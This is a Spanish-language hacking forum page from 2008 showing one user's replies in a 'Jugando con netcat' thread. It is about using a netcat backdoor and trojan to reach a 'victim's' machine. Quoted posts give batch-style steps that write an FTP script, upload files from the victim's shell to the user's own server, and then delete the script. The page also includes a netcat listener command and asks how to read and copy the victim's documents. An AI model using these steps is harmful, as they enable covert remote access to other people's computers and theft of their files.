elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Jugando con netcat en: 22 Abril 2008, 23:46 pm
Citar

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código
  1. echo usuario>>script
  2. echo pass>>script
  3. echo ascii>>script
  4. echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
  5. echo bye>>script
  6. start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
  7. del script
  8.  

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script


perdona que sea tan pesao hombre, pero es que veras, desde la consola de mi pc pongo eso tal cual, es decir, en usuario y en pass no pongo mis datos, lo pongo igual que viene en tu post. y me sube el archivo!, pero desde la shell de la "victima" no lo sube tio! que hago?

Una ayudita porfavoooooo!!!
grasiasss
2  Seguridad Informática / Hacking / Re: Jugando con netcat en: 22 Abril 2008, 20:23 pm
Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??


Por favor, contestar!!

Gracias.
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 21 Abril 2008, 19:37 pm

8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt     (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt     (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:


Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...


Justamente despues de hacer eso, me pone que hay un error desconocido.
Quiza no lo ponga donde es, donde se pone eso, en la shell donde salen los datos de la victima o en la mia? es que no se que puede pasar!!! ayuda pleaseeee!!
4  Seguridad Informática / Hacking / Re: Jugando con netcat en: 21 Abril 2008, 00:49 am
No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este post  ;)

Saludos

De nuevo te doy las gracias, pero comentarte que no me ha servido, pues tan solo consigo con eso, pasarme los archivos a mi pc, pero en blanco, es decir, por ejemplo, la "victima" tiene un documento word en el escritorio llamado: pepito, yo consigo recibir, un archivo word llamado pepito, pero en blanco.
Que es lo que hago mal? como puedo pasarme el archivo y verlo??
5  Seguridad Informática / Hacking / Re: Jugando con netcat en: 17 Abril 2008, 09:14 am
Buenos dias, en primer lugar decir que mi anterior duda, ya esta resuelta mi pregunta ahora es la siguiente, ayer estuve hasta las tantas leyendo todos los post, quiza con el sueño no lo vi, pero no encuentro esto:

Una vez que yo entro y veo los titulos de las cosas que tiene la victima, puedo verlas? es decir, una vez que he visto que tiene un archivo word por ejemplo, puedo abrirlo para verlo yo? se que lo puedo abrir para que lo vea la victima, pero y verlo yo? se puede?
O puedo guardarlo en mi pc, para luego verlo yo cuando yo quiera? a que parte de jugando con Netcat pertenece esto?

Contestarme por favor, y si esta en el foro remitanme a la pagina adecuada, pues no la encuentro.

Muchisimas gracias! sois unos makinas!!


Joder, no veas lo que se aprende en este foro, antes ya aprendi sobre seguridad de redes inalambricas, y ahora esto, que me fascina aun mas.
6  Seguridad Informática / Hacking / Re: Jugando con netcat en: 16 Abril 2008, 20:12 pm
Hola, me he leido todo el tutorial, pero aun asi consigo solucionar el problema que tengo, y es el siguiente:

Yo hago todo como dice desde el principio, todo igual, menos donde pone la ip de WHK, pues pongo la mia, la publica. Pues bien, luego cuando esta hecho el troyano, se lo paso a mi amigo, lo ejecuta, y pongo yo en ejecutar/cmd:

nc -vv -l -p 80  (intro)

y me sale una serie de cosas muy diferentes a lo que tenia que salir, es mas, me sale al principio la ip de WHK, la de 127.0.0.1, y yo no la puesto! que puedo hacer? otra de las veces me salio c:\windows>... pero era mi disco duro, porque registre y eran mis cosas!, que es lo que puedo hacer para acceder al disco duro de mi amigo??

Ni que decir tiene que mi amigo esta conforme, pues entre los dos estamos viendo esto.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines